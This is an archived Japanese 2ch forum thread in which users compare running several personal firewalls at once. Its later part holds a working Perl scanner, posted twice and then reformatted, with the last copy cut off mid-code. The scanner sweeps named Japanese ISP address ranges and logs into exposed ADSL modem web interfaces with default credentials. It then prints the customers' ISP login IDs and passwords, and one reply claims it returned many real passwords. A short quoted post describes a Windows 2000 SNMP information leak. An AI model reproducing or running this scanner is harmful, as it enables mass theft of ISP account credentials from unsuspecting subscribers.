ファイアウォールは一つだけでいいのか?
一つだけは不安じゃないのか?
しかし複数入れて不具合は出ないのか?
そこんところ語る場登場。
2 :
名無しさん@お腹いっぱい。:01/11/14 22:20
2get
分かってないので終了。
4 :
名無しさん@お腹いっぱい。:01/11/14 22:28
体験談きぼーん
5 :
名無しさん@お腹いっぱい。:01/11/14 22:29
相性が悪いと目されているもの
ゾネアラームとタイニー
ZONEALARM、TINY、BLACKICE、VB2000
これで向う5年くらいは大丈夫
ヨカッタヨカッタ
7 :
名無しさん@お腹いっぱい。:01/11/14 22:36
「ZoneとTinyの二本立て」
Tinyで、ルールにないアプリケーションを許可するかどうかのダイアログが出てこない。
Ask for action when no rule is foundはチェックが入っている。
FireWall Enabledにも入っている。
レベルはAsk me firstである。
Zoneには、問題のアプリケーションを許可する旨のルールができている。
Zoneをシャットダウンして、Zoneのルールを削除してからアプリケーションを起動すると
Tinyから許可するかどうか聞かれる。
これは一体どういうことかと。
8 :
名無しさん@お腹いっぱい。:01/11/14 22:37
フクスウファイアオーるかたりばか
ところでwin2kなどに標準装備のtpc filteringとかの機能は触れてもいいの?
あと、複数使ってきたぜごらぁ というのは?
できたらタイトル拙者のものを使ってもらいたかったなり
>>7 Tinyで全てを拒否するルールを作って有効にしているとか・・・
違ってたらスマソ
いっぱいproxy噛ませてます。当たり前だゴルァ大作戦▲▼
1 名前:ナナツサソ 投稿日:01/11/14 22:19
プロキシサーバは一つだけでいいのか?
一つだけは不安じゃないのか?
しかし多段にして不具合は出ないのか?
そこんところ語る場登場。
2 名前:名無しさん@お腹いっぱい。 投稿日:01/11/14 22:20
2get
3 名前:―――終了――― 投稿日:01/11/14 22:23
分かってないので終了。
スレ立てる前に、もうちょっと良く考えた方が良かったねえ。。
たしかにねえ、この話題は、いわゆる『がいしゅつ』ではないですよ。。
でもね、なぜ今まで、これと同じようなスレが立たなかったのか、
もうちょっと良く考えてみたらどうでしょうかねえ。。うん。。
つまりねえ、僕が言いたいのはね、これほどまでにつまらないスレはねえ、
いまだかつて、『誰も』考えたことすらない、ってことなんですよ。。
まぁその意味では、あなたには天与の才能があるってことなんでしょうけどね。。
でも、そんなこと何の自慢にもなりませんものねえ。。
まぁ、こういっちゃなんですがね、『ダメなやつは何やってもダメ』
ってことなんでしょうかね。。残念なことですがね。。
僕もこの2ちゃんねるに来るまではね、人はみな平等だ、って思ってましたよ。。
でもねえ、ちがったんですよ。。ダメなやつはダメなんですよ、何やっても。。
あなたも早く、そのことに気付いて欲しいものですね。。
『分相応』、それが一番、しあわせなんですから。。
まぁ、あまり気にしないようにね。。精神衛生上良くないですからね。。
こんなこと2ちゃんねるでは日常茶飯事ですからね。。じゃ、このへんで。。
ところで、こことは別の、あのクソスレもあなたが立てたの?
今までZoneAlarmだけでやってたんだけど、どこかからのアクセスを防いだときには
The firewall has blocked Internet access to your.........と出ていた。
2chに書き込む際のポートスキャンも記録されてなかった。
ところがTiny入れたら、Zoneのほうにポートスキャンの痕跡が大量に残るようになり、
警告もThe firewall has blocked routed traffic..........と変わった。
こりゃ何だと。
13 :
名無しさん@お腹いっぱい。:01/11/14 22:52
>>9 順に書く。
俺のとこはまずポート1から52まで拒否。
次に52から79まで。
81から442まで。
444-7999まで、
8001-8079まで、
8081-8430、
8432-65535。
このような設定をしておる。要はHTTP以外全部潰してる。
FTPができないと困るので、別個FTPソフト専用の「アプリケーション限定ルール」を作って対処。
だけど、時計合わせソフトが使えないんだこれが。
ポート53を使って時計サーバに繋ぐというから空けてるんだが、
何故か3番目のルールが適用されて繋げず。
>>8 もう何でもありにしよかー。
14 :
名無しさん@お腹いっぱい。:01/11/14 22:53
>win2kなどに標準装備のtpc filteringとかの機能は触れてもいいの?
ぜひ語って欲しい!
4行目、54から79だった
あと、時計合わせソフト専用のルールも作ってること書き忘れ。
再現するかが問題だが。
というかみんな一つでやってるのか。
>>13 漏れのTinyのルールは、上から・・・
Loopback anyport [127.0.0.1]:[anyport]
DNS anyport [anyadress]:[53]
OutGoing ICMP [8] Echo Request
Incoming ICMP [0] Echo Reply
アプリケーション毎に許可ルールを幾つか作って
最後にAllDenyって名前で全部拒否
つーかZoneとTinyどっちかに絞った方が・・・
ってな事言っちゃうと、このスレ・・・(;´Д`)
タイニーだけじゃ不安なんだよ!
ノートンなら
Cookieブロック、スクリプトブロック、ユーザーエージェントブロック(書き換え可)
Refferブロック(書き換え可)、ブラウザからのメールアドレス参照ブロック(書き換え可)
できるしさ!ノートンとタイニーで斎京。氷でもいいけどさ!
>>18 Tinyスレの722だよね。
今Zoneはどうしてる?
あとノートン+Tinyでは問題ないのかい。
色々試して様子見だよ!
21 :
名無しさん@お腹いっぱい。:01/11/14 23:13
俺はTiny+Proxomitronでやってる
問題ないっつーか、機能的にカブる。
独自のものもあるんだが・・・
難しいな
ニーズがない。
24 :
名無しさん@お腹いっぱい。:01/11/14 23:23
>>22 ノートン+Tinyではかちゅーしゃの件のように
新規プログラムを立ち上げてもルール作成を問い合わせてこない
といった目に見える不都合はおきていないのかい?
そういやないね。
ノートンはプログラム検出やってないんじゃないか?
書き方が悪かった
プログラムというか、パケットだけを見ているとゆーか。
以前やってたことあるな
tyny & zone
特にぁゃιぃ動作はしなかったな
至って快調だった
28 :
名無しさん@お腹いっぱい。:01/11/14 23:39
その不具合はFAQにも載ってないな。
tynyぢゃねえやtinyだ
アフォ丸出しすんまそ
OSはWIN98で、
入れてるものでOSと同時起動するのは
VB2000
Tiny
Zone
あとはIMEとかサウンド音量調節のアレ
特に何もなさげなんだがなあ。
>>30 ほう。
インストールの順番を教えて。
あと新規にアプリを起動した時なんかはどういう順番で問い合わせてくるの?
ログもそれぞれどんなのか気になる。
インストールの順番は
VB2000
ノートン
Zone
Tiny
(FW3本起動させてるとき)
ついこの前Mozilla0.9.5入れたんだけど、まっさきに聞いてくるのはZone。
Zone許可するとノートンが
「Mozzilla.EXEがインターネットにアクセスしようとしています・・・云々」と聞いてくる。
こんなとき、Tinyはウンともスンとも言わない。
Explorer.EXEというのがインターネットにアクセスしようとしている
ということを教えてくれるのは何故かZoneだけ。
ノートンは知らせてくれない。Tinyも黙りっぱなし・・・
別にWINアップデートも何もしようとしてないのに、Explorer.EXEが何故アクセスしたがるのかも不明、
ノートンがプログラムを検出するのなら、何故これを見逃すのかも不明、
ウィルスかと思ってノートンのアンチウィルス(体験版だけど)最新パターンとVB2000の最新版パターンで
チェックしても問題なし。う〜ん?
>>33 俺も同じ事あったよ、でもTinyは反応したけどな。
>Explorer.EXEが何故アクセスしたがるのかも不明
これはまったく不明
そんで、それは何故なのか検索しても、人に聞いても「わからん」なんだよな・・・
「なんで俺のとこのTinyは黙っているのか」も。
>Explorer.EXEが何故アクセスしたがるのか
フォルダをWebページで表示、にしているとか・・・?
んでエクスプローラで外部にリンクの貼られたhtmlファイルを選択したときとか・・・?
う〜、漏れのおつむじゃわからんちん(;´Д`)オバカデゴメンネ
MPEG4とかの動画ファイルのところにマウスポインタを持っていったと思われ
プレビュー関係の事ね
38 :
名無しさん@お腹いっぱい。:01/11/15 00:34
Explorer.exeが接続しようとする意味、WINFAQにあるんだけど。
シマンテックに問い合せたことあるが、許可して構わないとのこと。
ノートンはTinyみたいにアプリ毎にlocal/remoteのaddress,port指定はできるんだっけ。
すると
ノートン+Zone,Tiny+Zoneの組み合わせはは意味あるといえるのか(表面的には)。
>>36>>37 それも考えた。極力外部にアクセスをしないよう設定してあると思うのだが・・・
メディアプレイヤー7も勝手にアクセスしようとする。アップデートの確認、Codecの自動ダウン禁止。
果ては個別識別禁止、プロトコルにはUDP6699を使うようにしてFWで塞ぐ。個別にも禁止ルールを使う。
が、やっぱりZone動いてるとTiny働いてくれんのだ・・・
>>39 そう、だから機能的にもかぶると見た。好きな方でいいと思う
検出が確実そうなZoneと設定でのブロックが確実そうなものを合わせたら良さそうだと考えた。
NIS+TinyよりTiny+Proxomitron+NAVの方がよいと思い混んでるけどどうよ?
>>41 それは無駄がない、意味のある組み合わせだか
スレの趣旨に反する。
Tinyは設定が難しいというイメージがあるね。
日本語での説明が少ないということもあるんだろうけどさ。
ブラックアイスって
他のFWの後ろに隠れない?
ブラックアイスが先に探知することってあまり無い
(ほかのFWと一緒に入れてるとき)
>44 TINYと併用させてるけどTINY終了させると探知しまくるような...
>>42 このスレは冗長で、かなり無意味かもしれない組み合わせが
話題だからな。
47 :
名無しさん@お腹いっぱい。:01/11/15 16:59
>>32 それだけじゃ不安だろ。
ついでに
OUTPOSTとSYGATEも入れとけよ。
なんか動きがあるかもしれんぞ。
ZoneAlarmProとZoneAlarmを両方立ち上げているヤツは
さすがにいないだろうな。
それ(・∀・)イイ!!
>>32 Proも入れよう!!
10個位入れたやついないのか?
w2kのtcp/ip filtering使うとtinyよりも先に許可を出してしまう気がする
今、格闘中 他の防火壁も試してみて報告するよ さーらばじゃ
>>13 時計合わせ(NTP)はポート123では?
53はDNSだよ。
ちなみに53へのoutputを止めると名前解決出来なくなるはずです。
ノートン Personal Firewall & Zone, ノートン Personal Firewall & TPF は、正常に動いてまっせ。
Win98 上で tiny と Zone を同時というのも過去に試したけど、うまくいかなかったす(起動時に凍るので、DOS モードから強制的に Zone のフォルダを丸ごと削除で切り抜けるしかなかった)
54 :
名無し~3.EXE:01/11/16 22:10
最近In UDPで67番からlocalの68番あたりに来るのがやたら多くて
今のところは全部遮断してるんですがいいんでしょうか?
55 :
名無しさん@お腹いっぱい。:01/11/17 00:32
OSは何使ってるんですか?
NT?2000?
9xじゃシステムリソースが・・・・
>>54 ファイアーウォールソフトを2つ以上入れたら教えて進ぜよう
ノートン体験版、ブラックアイス体験版、ゾーンアラーム
今時95でTPFなんですが。システムリソースとなんか関係あるんですか?
59 :
名無しさん@お腹いっぱい。:01/11/17 01:31
>>52時計合わせソフトのヘルプより。
■ 技術的情報 ■
・プログラム作成にはMicrosoft Visual C++ 6.0を使用しております。
・インターネットに接続しているか確認する為、一定時間の間隔でDNSに対して参照を行っています。
またLANにて使用している場合は、ポート123(NTP)が接続できる環境である事。
俺もおかしいと思ったんだが、123行く前から蹴られる。
>>60 プロバイダのDNSとのやりとりの設定はうまくいってるの?
もっとも、これがうまくいってないとwebブラウジングにも支障が出るよな。
62 :
名無しさん腹減った。:01/11/17 05:36
で、効果的な組み合わせはどれなんだ?
俺は今のところNISとBIなんだが。
63 :
名無しさん@お腹いっぱい。:01/11/17 10:52
Tiny+Proxomitron+NAVこれだ!
64 :
名無しさん@お腹いっぱい。:01/11/17 17:01
誰か、Win2kのFilteringについて語って下さい。
65 :
名無しさん@お腹いっぱい。:01/11/18 19:29
ZoneProとProxomitron
これいいよ。
66 :
名無しさん@お腹いっぱい。:01/11/18 22:00
W98にSYGATE・ZONE・NIS(インストールした順)といれてますが。
SYGATE意味なさそう。働き者はZONE。
>>66 これってさ本当にzoneがいいってこと?
どうやって確かめているかが不明なんですけど.....
自分で自分をアタックとかやってみる人とかいないんですか?
おれは無理だけど
スキル的に
68 :
名無しさん@お腹いっぱい。:01/11/19 08:36
一番はZone。でも、リソースを食うので今はTPFを使ってる。どうせルーターもあるしね。
69 :
名無しさん@お腹いっぱい。:01/11/19 14:15
NAT
>>69 ワラタ
FWとIDSの区別か付かない人たちが大半のスレ
普通に見る分には支障ない。
けど、時計合わせだけなんかおかしいんだよな・・・
優先度を高くしてもおかしー。
今、色々試してるけど
72 :
名無しさん@お腹いっぱい。:01/11/20 19:42
で、結論は?FWを捨てて全ポート開放!!!!!!!!!
これでどうよ
>72
うん!それ最強!!
VB2002とは何のFWでも相性悪そうだよ。
76 :
名無しさん@お腹いっぱい。:01/12/01 02:56
えへへ
77 :
名無しさん@お腹いっぱい。:01/12/01 04:08
あはん
78 :
名無しさん@お腹いっぱい。:01/12/01 16:39
なまじ複数入れちゃうとね、
アンインストールに困る場合があるけど
やっぱり比較マンはやらずには
いられんのだなあ
うむ冒険者だよねうむ
NISとZONE入れてる。
この組み合わせはいいのか悪いのか。
80 :
名無しさん@お腹いっぱい。:01/12/06 18:11
PC初心者です
ウィンドウズXPにあらかじめ入っている
ファイアウォールの設定の仕方を教えてください。
お願いします。
いま、何の設定もしないで常時接続しているのですが
これは危険でしょうか?
81 :
名無しさん@お腹いっぱい。:01/12/06 18:42
FireWallの多用はシステムの競合を招くだけだからね。
82 :
名無しさん@お腹いっぱい。:01/12/06 18:42
83 :
名無しさん@お腹いっぱい。:01/12/06 18:42
84 :
名無しさん@お腹いっぱい。:01/12/06 18:44
>>79 周囲でその二つで不具合が出たと言うのは聞いた事が無いので、
とりあえず、良いんでないの?不具合が出てから、考えませう。
まぁ。不具合が出た事に気づいた頃には手遅れと言うのが多いが…(w
85 :
名無しさん@お腹いっぱい:01/12/06 20:15
>>84 そか、ありがとう。
とりあえず、このままいってみる。
>まぁ。不具合が出た事に気づいた頃には手遅れと言うのが多いが…(w
そんなこと言うなよ、おどおどしながら生活せにゃならんがな。
86 :
名無しさん@お腹いっぱい。:01/12/07 00:55
>>85 すまん。おどおどさせる気はなかったんだ。
んで、自分よりも詳しい友達にも少し聞いてみたが、同意見だったよ。
↓は全部嘘かもしれないと思いながら見てくれ。俺が寝不足と酒で朦朧としているのと、知識が無いのとでちゃんと覚えてない。
詳しく聞くとNortonの方は、一部分が詳しくくいこんでいないとか・・・?(うろ覚えですまん。
で、その場所をZONEらが、入っているとか。
とりあえず、ZONEとTinyとかの類は互いに、くいこむ場所が同じなのでヤバイと…。
ちゃんと覚えてなくて、すまん。
とりあえず、NortonとZONEの組み合わせは、今の所変な話も聞かないし、大丈夫と。
そのあたりの競合に詳しい方、補足・訂正頼む。(;w;/
ノートンとタイニーだと
たまに落ちることあり
重複するブロックルール作ってるときね
ノートンで「!」マーク出て、ノートンでブロックしたのかと思いきや
続けざまタイニーのアラートが出てそのまま無反応
あくまでも、毎度ではなく「たまに」ね
しかし確率少々高めの「たまに」
>>10とか
>>11に書いてあることをよく読みましょう。
89 :
名無しさん@お腹いっぱい:01/12/07 02:00
>>86 またまたありがとう。
安心して眠れるよ。
詳しい内容聞きたいけど、理解出来る自信なし。
でも少しずつ詳しくなっていかなきゃならんのだよなぁ〜。
90 :
名無しさん@お腹いっぱい。:01/12/07 02:22
Zoneが検出しまくりって言うのはどうでもいいポートスキャンとか
一生懸命知らせてくれるからだよ。
Tiny、Sygateはいちいちそれくらいのことでは騒がない。
うちはSygate、オミトロン、NAVで使ってる。
FWの重複使用なんて意味無いと思うけどな。
NIS+TinyがいいってやつはOutpost使っとけ。
これ一つで同じことができる。
それが「検出しまくり」よ
92 :
名無しさん@お腹いっぱい。:01/12/07 02:32
騒がないんじゃなくて、設定しないとブロックしないからだよ(ワラ
だからデフォではステルスにならずにクローズになっとるんやんけ
うちはルータで設定してるからShieldsUPでスキャンしても
全部ステルスだけどね。
95 :
名無しさん@お腹いっぱい。:01/12/07 11:03
うちのFWは一生懸命、Microsoft Updateをブロックしてるよ。
96 :
名無しさん@お腹いっぱい。:01/12/07 17:56
え〜。不正を検地した時のポップアップの話題みたいですけど、
やっぱり、デフォルトで回数が一番多いのはZoneですね。
理由は
>>90さんが書いてくれていますね。
Tinyの場合は、自分でポートなども指定する方なのと、
デフォルトでは検地してもポップアップを出さない設定になっているので、
初心者やZoneの人が使うと、「静かすぎてちゃんと動いてる?」になります。
安心してください。設定を間違えてなければ、静かなだけでちゃんと動いていますので。
97 :
名無しさん@お腹いっぱい。:01/12/08 02:29
ルーターはまた別だべヨ!
98 :
名無しさん@お腹いっぱい。:02/01/09 23:18
おもしろいので、age
なぜそんなにFairewollを信じて居るんだろうね。
はっきり言ってアホだね。
ウヒヒ。
禿げ銅。
FaireWoooooooll
しんぢてる奴はアホだね。
漏れ、FireWallは一応入れてるけど。。
ぼくはFireWallソフトが入っていてもハックする真珠プログラムを完成させた。
はっきり言って天才だね
キッヒヒ。
>>101 つか、その手の奴、結構前からパケストなんかで既出だったような。。。
パソワードに決まっているだろ
>>103 プロバイダーのユーザー名とパソワードがわかるとたのしいだろ
使い道を考案中だのね
ウッシシ。
105 :
Japanese Tea:02/01/10 23:28
あぁ僕ってすごいよ。
まじで。
FireWollがあっても、パスを奪取できるハッキングプログラムを作ったんだからね。
すごいだろ。
ケケケ。
106 :
名無しさん@お腹いっぱい。:02/01/10 23:31
信じてないだろ
>>106 まぁバカにはぼくのハカープログラムは理解できないと思うがね。
メアドを教えてくれれば、プログラムを見せてやってもよいのだが、
貴様には公開する勇気はないだろうね。
ウッケケ。
108 :
名無しさん@お腹いっぱい。:02/01/10 23:43
マジレスしてすまんが
>>105 そりはいったい、どこからパスを抜くのだ?
クライアントPCから? それとも プロバイダのサーバーPC?
109 :
Japanese Tea:02/01/10 23:50
そいつは簡単にはさらせないな。
まぁ凡人(106)にはそれぐらいしか想像ができないのだね。
あぁ発想が貧困だ。
まじでバカだね。
ハッカープログラムを教えて欲しければメアドを教えな。
それをみたら君でも理解できるかも知れないな。
いや無理だろうな。
ククク。
110 :
名無しさん@お腹いっぱい。:02/01/11 00:22
間に受けるなよ
>>109 ついでに言っとくが、
そんなものによだれたらしとる109も
逝ってよし。
111 :
名無しさん@お腹いっぱい。:02/01/11 00:23
大介元気だなあ
なるほど。ソーシャルハクらしい…。
113 :
Japanese Tea:02/01/11 00:36
バカどもは信じないので、
まぁさわりの部分だけでも見せてやろう。
これだけでは意味はないがな。
ソーシャルハクではなさそうだろ
>>112 メアド教えたら続きを見せてやるがな。
カカカ。
#!/usr/bin/perl
# ODN 61.123.128.0/19
# ODN 61.201.0.0/18
# Nifty 61.121.64.0/19
# Nifty 61.210.0.0/18
# RIMNET 202.247.144.0/21
if ($ARGV[0]=~/(\d+)\.(\d+)\.(\d+)\.(\d+)\/?(\d*)/) {
$ip[0]=$1;$ip[1]=$2;$ip[2]=$3;$ip[3]=$4;
$m=($5>=16)?$5:24;$c=2**(32-$m);
if ($m<24) {$ip[3]=0;$ip[2]=int($ip[2]*256/$c)*$c/256;}
elsif ($m>=24) {$ip[3]=int($ip[3]/$c)*$c;}
} else {print "example: hack.pl 61.210.6.0/24\n";exit;}
$|=1;$SIG{'ALRM'}='kill';
for ($i=1;$i<=$c;$i++){
$pid=fork;
if ($pid==0) {alarm 3;&ip;exit;}
push(@pida,$pid);
unless ($i%64) {
sleep 1;
if($#pida>=255){foreach $j (1..64) {waitpid(shift(@pida),1);}}}
$ip[3]++;
if ($ip[3]==256) {$ip[2]++;$ip[3]=0;}
}
114 :
名無しさん@お腹いっぱい。:02/01/11 00:40
150 名前:ゴマキの近所男。 投稿日:02/01/11 00:32
なにが問題になるのかというと、これは、誰がなにをインストールしていてなにをやっているかが、ディフォルトのパスワードで誰でも分かってしまうのである。
実際どうなるかというと、結果を一部取り出してみると・・・・
25.6.3.1.2.1 = "DVD-RAM Utility"
25.6.3.1.2.2 = "GIMP" Hex: 47 49 4D 50
25.6.3.1.2.3 = "GSview and Aladdin Ghostscript"
25.6.3.1.2.4 = "MEIMI"
25.6.3.1.2.5 = "Mjuice Media Support for Winamp"
25.6.3.1.2.6 = "Netscape Communicator 4.7"
インストールされているソフトウェアが丸見えだ。会社のマシンにゲームを入れていたり、さらにぁゃ?ぃゲームが入っていたりすると・・・。
これはほんの一部である。このような情報が1500行以上も取れるのである。他にも現在動いているプロセスやハードウェア構成など、誰でも取れる情報になっている。
このほうほうは、ルーターやサーバーなどのネットワーク機器を管理するときに使う方法と同じ方法で取得しているのだが、Windows2000の場合は普通では見れないような拡張がなされているため。インストールしてるソフトやプロセスなども分かってしまうのである。
おそらくこれは、セキュリティーホールではなく仕様である。
115 :
Japanese Tea:02/01/11 00:54
バカどもはこれぐらいのソースでも理解できないようだな。
おとなしくなったな
>>110-112 あぁおれってバカにバカにされたのだな。
かなしいね。しくしく。
続きを知りたいか?>アホども
ヒントはオレがその昔にここで警告しているわ。
僕は明日、厨学校へいくのでそろそろねるぞ。
ケケケ。
普通はそんなに長い間、
こんな駄スレに貼りついてないだろ
>>113 これだけじゃ何をするのか分からんが、
ファイアウォールとかは関係なく使えるのか?
謎・・・
>>113 このソースでは、パラメータの取得とforkシステムコール行っているくらいしか
分かりません。&ip の処理を教えてください。
119 :
Japanese Tea:02/01/11 17:45
なんだかあほっぽいヤツだと思ったが、実は本物だったりするのかな。
その続きを公開きぼーん>>Japanese Tea
でもさぁ、彼の言うとおりパスワードが盗めるというプログラムを公開したら、
法的にはどうなんだろうか?
少なくとも、パスを盗んで使ったらまずいと思われるがね。
どだろ?
間違ってJapanese Teaを装ってしまった。
スマソ
>>114 それって、有名なアドミント・・・のHPのコピペじゃないか(ワラ
119
ジサクジエン失敗
そっかー。もぉいっそのこと全員名前をJapanese Teaにするか!
ココって所詮ネタスレだと思ってたが、マジレスしとる人居るの?
124 :
Japanese Tea:02/01/11 23:33
誰も信じていないようだな。
118は少しは分かるヤツらしいがね。
オレってFireWallなんて関係なしにパスが抜けるんだ。
しかもこの真珠プログラムはマルチスレッドで高速化処理も行っていたりするぞ。
だからパスをぬきまくりなんだぞ。
まぢですごいぞ>凡人ども
ククク。
ああ凡人でよかった。凡人じゃなきゃこんな書き込みしてしまうんだ。
>>124 NTTのフレッツADSL(1.5M)のサービスを受けようと思ってる今年24の男ですが
先ほどオフィシャルペーシ(申し込みページ)゙を確認したところ、ADSLモデムを購入
若しくはレンタルとあります。実は当方もうNTT ADSL MODEM N-2を所有し
ており、レンタルも購入も不要なわけですがこういった場合どうしたらいいと
思います?
また自宅が中継基地局から3km位離れているのですがどのくらいの速度
が出るものなのでしょうか?(アナログ回線、特に最たるノイズ源なし)
127 :
Japanese Tea:02/01/12 00:27
凡人じゃないところをみせてあげよう。
コシ抜かすんじゃないぞ。
実行するとやばいことになるので、凡人はやめておいた方がよいぞ。
ウケケ。
#!/usr/bin/perl
# ODN 61.123.128.0/19
# ODN 61.201.0.0/18
# Nifty 61.121.64.0/19
# Nifty 61.210.0.0/18
# RIMNET 202.247.144.0/21
if ($ARGV[0]=~/(\d+)\.(\d+)\.(\d+)\.(\d+)\/?(\d*)/) {
$ip[0]=$1;$ip[1]=$2;$ip[2]=$3;$ip[3]=$4;
$m=($5>=16)?$5:24;$c=2**(32-$m);
if ($m<24) {$ip[3]=0;$ip[2]=int($ip[2]*256/$c)*$c/256;}
elsif ($m>=24) {$ip[3]=int($ip[3]/$c)*$c;}
} else {print "example: hack.pl 61.210.6.0/24\n";exit;}
$|=1;$SIG{'ALRM'}='kill';
for ($i=1;$i<=$c;$i++){
$pid=fork;
if ($pid==0) {alarm 3;&ip;exit;}
push(@pida,$pid);
unless ($i%64) {
sleep 1;
if($#pida>=255){foreach $j (1..64) {waitpid(shift(@pida),1);}}}
$ip[3]++;
if ($ip[3]==256) {$ip[2]++;$ip[3]=0;}
}
おい
>>124 NTTの社員のパスを抜いて、126の調べてやれ。
waitpid(shift(@pida),1) while ($#pida >= 0);sleep 1;print STDERR "\n";
sub ip {$ipstr="$ip[0].$ip[1].$ip[2].$ip[3]";
$addr=pack('CCCC',$ip[0],$ip[1],$ip[2],$ip[3]);
$this=pack('S n a4 x8',2,0,"\0\0\0\0");
$that=pack('S n a4 x8',2,80,$addr);
socket(S,2,1,6); bind(S,$this);
unless (connect(S,$that)) {
print STDERR "$ipstr...refused \r";return;}
$fh=select(S);$|=1;select($fh);
print S "GET / HTTP/1.0\r\n\r\n";
while (<S>) {
$server=$1 if (/^Server: ([^\r\n]*)/);
$au=$1 if (/^WWW-Authenticate: Basic realm="(\w*)"/);}
close(S);
unless (($server=~/^ALLIS\/FOS/ && $au eq 'user')
|| ($server=~/^Apache\/1\.1\.3$/ && $au eq 'Config')) {
print "$ipstr...failed1 ($server)\n";return;}
$this=pack('S n a4 x8',2,0,"\0\0\0\0");
$that=pack('S n a4 x8',2,80,$addr);
socket(S,2,1,6); bind(S,$this);connect(S,$that)||return;
$fh=select(S);$|=1;select($fh);
&atur if ($server=~/^ALLIS\/FOS/);
&mega if ($server=~/^Apache\/1\.1\.3$/);
if ($suc==2) {print "$ipstr...ID: $id, Password: $pass ($server)\n";}
else {print "$ipstr...failed2 ($server)\n";}
}
sub atur {print S "GET /easy HTTP/1.0\r\nAuthorization: Basic Y29uZmlnOg==\r\n\r\n";
while (<S>) {
if (/NAME="PA_LOG"/) {/VALUE="([^"]+)"/;$id=$1;$suc++;}
if (/NAME="PA_PS"/) {/VALUE="([^"]+)"/;$pass=$1;$suc++;}}}
sub mega {print S "GET /cgi-bin/Basicset.cgi?basic_num=1&reloadmenu=1 HTTP/1.0\r\nAuthorization: Basic cm9vdDpyb290\r\n\r\n";
while (<S>) {
if (/NAME="send_id"/) {/VALUE="([^"]+)"/;$id=$1;$suc++;}
if (/NAME="send_passwd"/) {/VALUE="([^"]+)"/;$pass=$1;$suc++;}}}
sub kill {exit;}
131 :
Japanese Tea:02/01/12 00:33
ウケケケケケ。
133 :
Japanese Tea:02/01/12 01:40
なんだよ誰も理解できないのか。
やはり2chにいてるやつはバカバッカスだな。
カカカ。
>>133お前バカだろ?
ソース書くならム板池よ
しかしPerlよみづれー
>>128 >>130 これを実行するとかなりやばいことになるぞ。
Perlのソースだから実行する人はほとんどいないと思われるが…。
読みづらいのは、分かりにくくするためにわざとやってるんじゃないかな。
何が起こってもしーらない。
まじ危ないからsage
たしかに読みにくいけど、HTTP のプロトコルのとこだけみれば
何やってるのか(何がしたいのか)はわかる。
web たててるサーバーが二つあって、認証のところに穴があって、
cgi がよめてしまう?
ちがうかな・・・
コメント文入れて再アップきぼーん(藁
>>128-130 ALLIS/FOS搭載ルータ(NEC IP45/025、Fujikura FNX0550)でWWWインタフェースへ
外部からアクセス可能にしている場合にパスワードを取得してみたり、Apache 1.1.3に
Basicset.cgiが存在している場合にidとパスワードを取得してみたりしてますな。
しかし、「ルータのWWWインタフェースに外部からアクセス可能」なんて普通やるか?
Basicset.cgiなんてCGIプログラムも知らないし。つか1.1.3って古すぎ…
>>138 > しかし、「ルータのWWWインタフェースに外部からアクセス可能」なんて普通やるか?
てゆーか、それを防ぐのが広義のファイアウォールというかルータの
パケットフィルタリングでしょう。
フィルタ設定していないなら「ファイアウォール設置した」なんて言えないし。
もすこし現実的なシチュエーションでパス抜けるプログラム希望。
140 :
名無しさん@お腹いっぱい。:02/01/12 15:21
>>138 >しかし、「ルータのWWWインタフェースに外部からアクセス可能」なんて普通やるか?
PPPoAタイプのモデム&ルーターはデフォルト設定で外部から許可されている場合が多いよ。
たぶん、いざというときにプロバイダーがリモート管理できるようにとの配慮だと思われます。
Netmeetingをするために友達のモデムの設定を外部から設定してあげたことがあります。
だれか実行したやつは居ないのか?
報告きぼーーん。
141 :
名無しさん@お腹いっぱい。:02/01/12 18:32
NECのルーターにWWWインターフェースなんてあったっけ?
>>140 実行してみました。
なんだかADSLモデムに設定してあると思われるプロバイダのパスワードが
ざくざくでてきました。
まぢでやべーよ。このスクリプト。
>>124 "マルチスレッドで"ってプロセス生成しまくっただけで、マルチスレッドかよ!
そんなに言うならもう少し"まし"なプログラム組めば?
こんなんじゃ、厨房なの以外釣れないし。
ソース出てきたから期待してたけど、本物なんてそう簡単にいるわけないか・・・
if ( $ARGV[0]=~/(\d+)\.(\d+)\.(\d+)\.(\d+)\/?(\d*)/ ) {
$ip[0]=$1;
$ip[1]=$2;
$ip[2]=$3;
$ip[3]=$4;
$m = ($5>=16) ? $5 : 24;
$c=2**(32-$m);
if ($m<24) {
$ip[3]=0;
$ip[2]=int($ip[2]*256/$c)*$c/256;
}
elsif ($m>=24) {
$ip[3]=int($ip[3]/$c)*$c;
}
}
else {
print "example: hack.pl 61.210.6.0/24\n";
exit;
}
$|=1;
$SIG{'ALRM'}='kill';
for ($i=1;$i<=$c;$i++){
$pid=fork;
if ($pid==0) {
alarm 3;
&ip;
exit;
}
push(@pida,$pid);
unless ($i%64) {
sleep 1;
if($#pida>=255){
foreach $j (1..64){
waitpid(shift(@pida),1);
}
}
}
$ip[3]++;
if ($ip[3]==256) {
$ip[2]++;
$ip[3]=0;
}
}
waitpid(shift(@pida),1) while ($#pida >= 0);
sleep 1;
print STDERR "\n";
sub ip {
$ipstr="$ip[0].$ip[1].$ip[2].$ip[3]";
$addr=pack('CCCC',$ip[0],$ip[1],$ip[2],$ip[3]);
$this=pack('S n a4 x8',2,0,"\0\0\0\0");
$that=pack('S n a4 x8',2,80,$addr);
socket(S,2,1,6);
bind(S,$this);
unless (connect(S,$that)) {
print STDERR "$ipstr...refused \r";return;
}
$fh=select(S);
$|=1;
select($fh);
print S "GET / HTTP/1.0\r\n\r\n";
while (<S>) {
$server=$1
if (/^Server: ([^\r\n]*)/);
$au=$1
if (/^WWW-Authenticate: Basic realm="(\w*)"/);
}
close(S);
unless (
($server=~/^ALLIS\/FOS/ && $au eq 'user')
|| ($server=~/^Apache\/1\.1\.3$/ && $au eq 'Config')
)
{
print "$ipstr...failed1 ($server)\n";
return;
}
$this=pack('S n a4 x8',2,0,"\0\0\0\0");
$that=pack('S n a4 x8',2,80,$addr);
socket(S,2,1,6);
bind(S,$this);
connect(S,$that)||return;
$fh=select(S);
$|=1;
select($fh);
print S "GET /easy HTTP/1.0\r\nAuthorization: Basic Y29uZmlnOg==\r\n\r\n";
while (<S>) {
if (/NAME="PA_LOG"/) {
/VALUE="([^"]+)"/;
$id=$1;
$suc++;
}
if (/NAME="PA_PS"/) {
/VALUE="([^"]+)"/;
$pass=$1;
$suc++;
}
}
if ($server=~/^ALLIS\/FOS/);
print S "GET /cgi-bin/Basicset.cgi?basic_num=1&reloadmenu=1 HTTP/1.0\r\nAuthorization: Basic cm9vdDpyb290\r\n\r\n";
while (<S>) {
if (/NAME="send_id"/) {
/VALUE="([^"]+)"/;
$id=$1;
$suc++;
}
if (/NAME="send_passwd"/) {
